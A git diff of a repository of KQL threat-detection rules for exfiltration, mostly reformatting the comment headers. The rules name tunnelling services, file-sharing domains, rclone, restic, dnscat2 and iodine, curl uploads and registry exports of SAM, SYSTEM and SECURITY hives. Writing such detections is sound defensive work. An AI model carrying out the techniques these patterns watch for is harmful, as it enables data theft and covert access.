b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql @@ -1,14 +1,14 @@ -// Title: Communication To Ngrok Tunneling Service Initiated -// Author: Florian Roth (Nextron Systems) -// Date: 2022-11-03 -// Level: high -// Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. -// Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. -// While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508 -// False Positives: -// - Legitimate use of the ngrok service. - -DeviceNetworkEvents +// Title: Communication To Ngrok Tunneling Service Initiated +// Author: Florian Roth (Nextron Systems) +// Date: 2022-11-03 +// Level: high +// Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. +// Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. +// While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508 +// False Positives: +// - Legitimate use of the ngrok service. + +DeviceNetworkEvents | where RemoteUrl contains "tunnel.us.ngrok.com" or RemoteUrl contains "tunnel.eu.ngrok.com" or RemoteUrl contains "tunnel.ap.ngrok.com" or RemoteUrl contains "tunnel.au.ngrok.com" or RemoteUrl contains "tunnel.sa.ngrok.com" or RemoteUrl contains "tunnel.jp.ngrok.com" or RemoteUrl contains "tunnel.in.ngrok.com" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql index f842d018..e3a2d96c 100644 --- a/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql +++ b/KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql @@ -1,12 +1,12 @@ -// Title: Communication To Ngrok Tunneling Service - Linux -// Author: Florian Roth (Nextron Systems) -// Date: 2022-11-03 -// Level: high -// Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508 -// False Positives: -// - Legitimate use of ngrok - -DeviceNetworkEvents +// Title: Communication To Ngrok Tunneling Service - Linux +// Author: Florian Roth (Nextron Systems) +// Date: 2022-11-03 +// Level: high +// Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508 +// False Positives: +// - Legitimate use of ngrok + +DeviceNetworkEvents | where RemoteUrl contains "tunnel.us.ngrok.com" or RemoteUrl contains "tunnel.eu.ngrok.com" or RemoteUrl contains "tunnel.ap.ngrok.com" or RemoteUrl contains "tunnel.au.ngrok.com" or RemoteUrl contains "tunnel.sa.ngrok.com" or RemoteUrl contains "tunnel.jp.ngrok.com" or RemoteUrl contains "tunnel.in.ngrok.com" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql b/KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql index ffa803a4..acad549f 100644 --- a/KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql +++ b/KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql @@ -1,12 +1,12 @@ -// Title: Disk Image Creation Via Hdiutil - MacOS -// Author: Omar Khaled (@beacon_exe) -// Date: 2024-08-10 -// Level: medium -// Description: Detects the execution of the hdiutil utility in order to create a disk image. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration -// False Positives: -// - Legitimate usage of hdiutil by administrators and users. - -DeviceProcessEvents +// Title: Disk Image Creation Via Hdiutil - MacOS +// Author: Omar Khaled (@beacon_exe) +// Date: 2024-08-10 +// Level: medium +// Description: Detects the execution of the hdiutil utility in order to create a disk image. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration +// False Positives: +// - Legitimate usage of hdiutil by administrators and users. + +DeviceProcessEvents | where ProcessCommandLine contains "create" and FolderPath endswith "/hdiutil" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql b/KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql index 32245d57..37691026 100644 --- a/KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql +++ b/KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql @@ -1,12 +1,12 @@ -// Title: DNS Exfiltration and Tunneling Tools Execution -// Author: Daniil Yugoslavskiy, oscd.community -// Date: 2019-10-24 -// Level: high -// Description: Well-known DNS Exfiltration tools execution -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1048.001, attack.command-and-control, attack.t1071.004, attack.t1132.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: DNS Exfiltration and Tunneling Tools Execution +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2019-10-24 +// Level: high +// Description: Well-known DNS Exfiltration tools execution +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048.001, attack.command-and-control, attack.t1071.004, attack.t1132.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\iodine.exe" or FolderPath contains "\\dnscat2" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql b/KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql index ca744e1f..5a0a00a1 100644 --- a/KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql +++ b/KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql @@ -1,10 +1,10 @@ -// Title: Email Exifiltration Via Powershell -// Author: Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea) -// Date: 2022-09-09 -// Level: high -// Description: Detects email exfiltration via powershell cmdlets -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration - -DeviceProcessEvents +// Title: Email Exifiltration Via Powershell +// Author: Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea) +// Date: 2022-09-09 +// Level: high +// Description: Detects email exfiltration via powershell cmdlets +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration + +DeviceProcessEvents | where (ProcessCommandLine contains "Add-PSSnapin" and ProcessCommandLine contains "Get-Recipient" and ProcessCommandLine contains "-ExpandProperty" and ProcessCommandLine contains "EmailAddresses" and ProcessCommandLine contains "SmtpAddress" and ProcessCommandLine contains "-hidetableheaders") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql b/KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql index f03b6c91..4590dfd7 100644 --- a/KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql +++ b/KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql @@ -1,12 +1,12 @@ -// Title: Exports Critical Registry Keys To a File -// Author: Oddvar Moe, Sander Wiebing, oscd.community -// Date: 2020-10-12 -// Level: high -// Description: Detects the export of a crital Registry key to a file. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.discovery, attack.t1012 -// False Positives: -// - Dumping hives for legitimate purpouse i.e. backup or forensic investigation - -DeviceProcessEvents +// Title: Exports Critical Registry Keys To a File +// Author: Oddvar Moe, Sander Wiebing, oscd.community +// Date: 2020-10-12 +// Level: high +// Description: Detects the export of a crital Registry key to a file. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.discovery, attack.t1012 +// False Positives: +// - Dumping hives for legitimate purpouse i.e. backup or forensic investigation + +DeviceProcessEvents | where (ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E " or ProcessCommandLine contains " –E " or ProcessCommandLine contains " —E " or ProcessCommandLine contains " ―E ") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE") \ No newline at end of file diff --git a/KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql b/KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql index 973dff8c..f86b39b8 100644 --- a/KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql +++ b/KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql @@ -1,12 +1,12 @@ -// Title: Exports Registry Key To a File -// Author: Oddvar Moe, Sander Wiebing, oscd.community -// Date: 2020-10-07 -// Level: low -// Description: Detects the export of the target Registry key to a file. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.discovery, attack.t1012 -// False Positives: -// - Legitimate export of keys - -DeviceProcessEvents +// Title: Exports Registry Key To a File +// Author: Oddvar Moe, Sander Wiebing, oscd.community +// Date: 2020-10-07 +// Level: low +// Description: Detects the export of the target Registry key to a file. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.discovery, attack.t1012 +// False Positives: +// - Legitimate export of keys + +DeviceProcessEvents | where ((ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E " or ProcessCommandLine contains " –E " or ProcessCommandLine contains " —E " or ProcessCommandLine contains " ―E ") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security")))) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql b/KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql index d38ffa8d..aea9618f 100644 --- a/KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql +++ b/KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql @@ -1,14 +1,14 @@ -// Title: LOLBAS Data Exfiltration by DataSvcUtil.exe -// Author: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger -// Date: 2021-09-30 -// Level: medium -// Description: Detects when a user performs data exfiltration by using DataSvcUtil.exe -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1567 -// False Positives: -// - DataSvcUtil.exe being used may be performed by a system administrator. -// - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. -// - DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. - -DeviceProcessEvents +// Title: LOLBAS Data Exfiltration by DataSvcUtil.exe +// Author: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger +// Date: 2021-09-30 +// Level: medium +// Description: Detects when a user performs data exfiltration by using DataSvcUtil.exe +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1567 +// False Positives: +// - DataSvcUtil.exe being used may be performed by a system administrator. +// - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. +// - DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + +DeviceProcessEvents | where (ProcessCommandLine contains "/in:" or ProcessCommandLine contains "/out:" or ProcessCommandLine contains "/uri:") and (FolderPath endswith "\\DataSvcUtil.exe" or ProcessVersionInfoOriginalFileName =~ "DataSvcUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql index 88eeb015..fac0a202 100644 --- a/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql @@ -1,13 +1,13 @@ -// Title: Network Connection Initiated To BTunnels Domains -// Author: Kamran Saifullah -// Date: 2024-09-13 -// Level: medium -// Description: Detects network connections to BTunnels domains initiated by a process on the system. -// Attackers can abuse that feature to establish a reverse shell or persistence on a machine. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 -// False Positives: -// - Legitimate use of BTunnels will also trigger this. - -DeviceNetworkEvents +// Title: Network Connection Initiated To BTunnels Domains +// Author: Kamran Saifullah +// Date: 2024-09-13 +// Level: medium +// Description: Detects network connections to BTunnels domains initiated by a process on the system. +// Attackers can abuse that feature to establish a reverse shell or persistence on a machine. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 +// False Positives: +// - Legitimate use of BTunnels will also trigger this. + +DeviceNetworkEvents | where RemoteUrl endswith ".btunnel.co.in" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql index bc91a970..c3702834 100644 --- a/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql @@ -1,13 +1,13 @@ -// Title: Network Connection Initiated To Cloudflared Tunnels Domains -// Author: Kamran Saifullah, Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-05-27 -// Level: medium -// Description: Detects network connections to Cloudflared tunnels domains initiated by a process on the system. -// Attackers can abuse that feature to establish a reverse shell or persistence on a machine. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 -// False Positives: -// - Legitimate use of cloudflare tunnels will also trigger this. - -DeviceNetworkEvents +// Title: Network Connection Initiated To Cloudflared Tunnels Domains +// Author: Kamran Saifullah, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-05-27 +// Level: medium +// Description: Detects network connections to Cloudflared tunnels domains initiated by a process on the system. +// Attackers can abuse that feature to establish a reverse shell or persistence on a machine. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 +// False Positives: +// - Legitimate use of cloudflare tunnels will also trigger this. + +DeviceNetworkEvents | where RemoteUrl endswith ".v2.argotunnel.com" or RemoteUrl endswith "protocol-v2.argotunnel.com" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "update.argotunnel.com" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql index 5999853b..1a096444 100644 --- a/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql @@ -1,12 +1,12 @@ -// Title: Network Connection Initiated To DevTunnels Domain -// Author: Kamran Saifullah -// Date: 2023-11-20 -// Level: medium -// Description: Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.command-and-control, attack.t1567.001, attack.t1572 -// False Positives: -// - Legitimate use of Devtunnels will also trigger this. - -DeviceNetworkEvents +// Title: Network Connection Initiated To DevTunnels Domain +// Author: Kamran Saifullah +// Date: 2023-11-20 +// Level: medium +// Description: Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567.001, attack.t1572 +// False Positives: +// - Legitimate use of Devtunnels will also trigger this. + +DeviceNetworkEvents | where RemoteUrl endswith ".devtunnels.ms" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql index d218d981..bcb89fe0 100644 --- a/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql @@ -1,13 +1,13 @@ -// Title: Network Connection Initiated To Mega.nz -// Author: Florian Roth (Nextron Systems) -// Date: 2021-12-06 -// Level: low -// Description: Detects a network connection initiated by a binary to "api.mega.co.nz". -// Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1567.002 -// False Positives: -// - Legitimate MEGA installers and utilities are expected to communicate with this domain. Exclude hosts that are known to be allowed to use this tool. - -DeviceNetworkEvents +// Title: Network Connection Initiated To Mega.nz +// Author: Florian Roth (Nextron Systems) +// Date: 2021-12-06 +// Level: low +// Description: Detects a network connection initiated by a binary to "api.mega.co.nz". +// Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1567.002 +// False Positives: +// - Legitimate MEGA installers and utilities are expected to communicate with this domain. Exclude hosts that are known to be allowed to use this tool. + +DeviceNetworkEvents | where RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql b/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql index c0337f00..77c83489 100644 --- a/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql +++ b/KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql @@ -1,12 +1,12 @@ -// Title: Network Connection Initiated To Visual Studio Code Tunnels Domain -// Author: Kamran Saifullah -// Date: 2023-11-20 -// Level: medium -// Description: Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 -// False Positives: -// - Legitimate use of Visual Studio Code tunnel will also trigger this. - -DeviceNetworkEvents +// Title: Network Connection Initiated To Visual Studio Code Tunnels Domain +// Author: Kamran Saifullah +// Date: 2023-11-20 +// Level: medium +// Description: Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572 +// False Positives: +// - Legitimate use of Visual Studio Code tunnel will also trigger this. + +DeviceNetworkEvents | where RemoteUrl endswith ".tunnels.api.visualstudio.com" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql b/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql index 8ab40157..e9168354 100644 --- a/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql +++ b/KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql @@ -1,14 +1,14 @@ -// Title: Process Initiated Network Connection To Ngrok Domain -// Author: Florian Roth (Nextron Systems) -// Date: 2022-07-16 -// Level: high -// Description: Detects an executable initiating a network connection to "ngrok" domains. -// Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. -// While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572, attack.t1102 -// False Positives: -// - Legitimate use of the ngrok service. - -DeviceNetworkEvents +// Title: Process Initiated Network Connection To Ngrok Domain +// Author: Florian Roth (Nextron Systems) +// Date: 2022-07-16 +// Level: high +// Description: Detects an executable initiating a network connection to "ngrok" domains. +// Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. +// While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1572, attack.t1102 +// False Positives: +// - Legitimate use of the ngrok service. + +DeviceNetworkEvents | where RemoteUrl endswith ".ngrok-free.app" or RemoteUrl endswith ".ngrok-free.dev" or RemoteUrl endswith ".ngrok.app" or RemoteUrl endswith ".ngrok.dev" or RemoteUrl endswith ".ngrok.io" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/pua_rclone_execution.kql b/KQL/rules/Exfiltration/pua_rclone_execution.kql index e979ab9b..4ed26d96 100644 --- a/KQL/rules/Exfiltration/pua_rclone_execution.kql +++ b/KQL/rules/Exfiltration/pua_rclone_execution.kql @@ -1,10 +1,10 @@ -// Title: PUA - Rclone Execution -// Author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group -// Date: 2021-05-10 -// Level: high -// Description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1567.002 - -DeviceProcessEvents +// Title: PUA - Rclone Execution +// Author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group +// Date: 2021-05-10 +// Level: high +// Description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1567.002 + +DeviceProcessEvents | where (ProcessCommandLine contains "--config " and ProcessCommandLine contains "--no-check-certificate " and ProcessCommandLine contains " copy ") or ((ProcessCommandLine contains "pass" or ProcessCommandLine contains "user" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "sync" or ProcessCommandLine contains "config" or ProcessCommandLine contains "lsd" or ProcessCommandLine contains "remote" or ProcessCommandLine contains "ls" or ProcessCommandLine contains "mega" or ProcessCommandLine contains "pcloud" or ProcessCommandLine contains "ftp" or ProcessCommandLine contains "ignore-existing" or ProcessCommandLine contains "auto-confirm" or ProcessCommandLine contains "transfers" or ProcessCommandLine contains "multi-thread-streams" or ProcessCommandLine contains "no-check-certificate ") and (FolderPath endswith "\\rclone.exe" or ProcessVersionInfoFileDescription =~ "Rsync for cloud storage")) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql b/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql index 185731b4..5dcd00a2 100644 --- a/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql +++ b/KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql @@ -1,14 +1,14 @@ -// Title: PUA - Restic Backup Tool Execution -// Author: Nounou Mbeiri, Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-10-17 -// Level: high -// Description: Detects the execution of the Restic backup tool, which can be used for data exfiltration. -// Threat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, including cloud services. -// If not legitimately used in the enterprise environment, its presence may indicate malicious activity. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1048, attack.t1567.002 -// False Positives: -// - Legitimate use of Restic for backup purposes within the organization. - -DeviceProcessEvents +// Title: PUA - Restic Backup Tool Execution +// Author: Nounou Mbeiri, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-17 +// Level: high +// Description: Detects the execution of the Restic backup tool, which can be used for data exfiltration. +// Threat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, including cloud services. +// If not legitimately used in the enterprise environment, its presence may indicate malicious activity. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048, attack.t1567.002 +// False Positives: +// - Legitimate use of Restic for backup purposes within the organization. + +DeviceProcessEvents | where ((ProcessCommandLine contains "sftp:" or ProcessCommandLine contains "rest:http" or ProcessCommandLine contains "s3:s3." or ProcessCommandLine contains "s3.http" or ProcessCommandLine contains "azure:" or ProcessCommandLine contains " gs:" or ProcessCommandLine contains "rclone:" or ProcessCommandLine contains "swift:" or ProcessCommandLine contains " b2:") and (ProcessCommandLine contains " init " and ProcessCommandLine contains " -r ")) or ((ProcessCommandLine contains "--password-file" and ProcessCommandLine contains "init" and ProcessCommandLine contains " -r ") or (ProcessCommandLine contains "--use-fs-snapshot" and ProcessCommandLine contains "backup" and ProcessCommandLine contains " -r ")) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/python_webserver_execution_linux.kql b/KQL/rules/Exfiltration/python_webserver_execution_linux.kql index 2e97304e..175e8487 100644 --- a/KQL/rules/Exfiltration/python_webserver_execution_linux.kql +++ b/KQL/rules/Exfiltration/python_webserver_execution_linux.kql @@ -1,14 +1,14 @@ -// Title: Python WebServer Execution - Linux -// Author: Mohamed LAKRI -// Date: 2025-10-17 -// Level: medium -// Description: Detects the execution of Python web servers via command line interface (CLI). -// After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software. -// This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1048.003 -// False Positives: -// - Testing or development activity - -DeviceProcessEvents +// Title: Python WebServer Execution - Linux +// Author: Mohamed LAKRI +// Date: 2025-10-17 +// Level: medium +// Description: Detects the execution of Python web servers via command line interface (CLI). +// After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software. +// This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048.003 +// False Positives: +// - Testing or development activity + +DeviceProcessEvents | where ((FolderPath endswith "/python" or FolderPath endswith "/python2" or FolderPath endswith "/python3") or (FolderPath contains "/python2." or FolderPath contains "/python3.")) and (ProcessCommandLine contains "http.server" or ProcessCommandLine contains "SimpleHTTPServer") \ No newline at end of file diff --git a/KQL/rules/Exfiltration/rclone_config_file_creation.kql b/KQL/rules/Exfiltration/rclone_config_file_creation.kql index 876c3f50..016519fa 100644 --- a/KQL/rules/Exfiltration/rclone_config_file_creation.kql +++ b/KQL/rules/Exfiltration/rclone_config_file_creation.kql @@ -1,12 +1,12 @@ -// Title: Rclone Config File Creation -// Author: Aaron Greetham (@beardofbinary) - NCC Group -// Date: 2021-05-26 -// Level: medium -// Description: Detects Rclone config files being created -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1567.002 -// False Positives: -// - Legitimate Rclone usage - -DeviceFileEvents +// Title: Rclone Config File Creation +// Author: Aaron Greetham (@beardofbinary) - NCC Group +// Date: 2021-05-26 +// Level: medium +// Description: Detects Rclone config files being created +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1567.002 +// False Positives: +// - Legitimate Rclone usage + +DeviceFileEvents | where FolderPath contains ":\\Users\\" and FolderPath contains "\\.config\\rclone\\" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/split_a_file_into_pieces.kql b/KQL/rules/Exfiltration/split_a_file_into_pieces.kql index fd3ff922..1a657308 100644 --- a/KQL/rules/Exfiltration/split_a_file_into_pieces.kql +++ b/KQL/rules/Exfiltration/split_a_file_into_pieces.kql @@ -1,12 +1,12 @@ -// Title: Split A File Into Pieces -// Author: Igor Fits, Mikhail Larin, oscd.community -// Date: 2020-10-15 -// Level: low -// Description: Detection use of the command "split" to split files into parts and possible transfer. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1030 -// False Positives: -// - Legitimate administrative activity - -DeviceProcessEvents +// Title: Split A File Into Pieces +// Author: Igor Fits, Mikhail Larin, oscd.community +// Date: 2020-10-15 +// Level: low +// Description: Detection use of the command "split" to split files into parts and possible transfer. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1030 +// False Positives: +// - Legitimate administrative activity + +DeviceProcessEvents | where FolderPath endswith "/split" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql b/KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql index 8cc06d5b..b704ae58 100644 --- a/KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql +++ b/KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Curl File Upload - Linux -// Author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update) -// Date: 2022-09-15 -// Level: medium -// Description: Detects a suspicious curl process start the adds a file to a web request -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105 -// False Positives: -// - Scripts created by developers and admins - -DeviceProcessEvents +// Title: Suspicious Curl File Upload - Linux +// Author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update) +// Date: 2022-09-15 +// Level: medium +// Description: Detects a suspicious curl process start the adds a file to a web request +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105 +// False Positives: +// - Scripts created by developers and admins + +DeviceProcessEvents | where (((ProcessCommandLine contains " --form" or ProcessCommandLine contains " --upload-file " or ProcessCommandLine contains " --data " or ProcessCommandLine contains " --data-") or ProcessCommandLine matches regex "\\s-[FTd]\\s") and FolderPath endswith "/curl") and (not((ProcessCommandLine contains "://localhost" or ProcessCommandLine contains "://127.0.0.1"))) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql b/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql index 5a428f6c..c2d29199 100644 --- 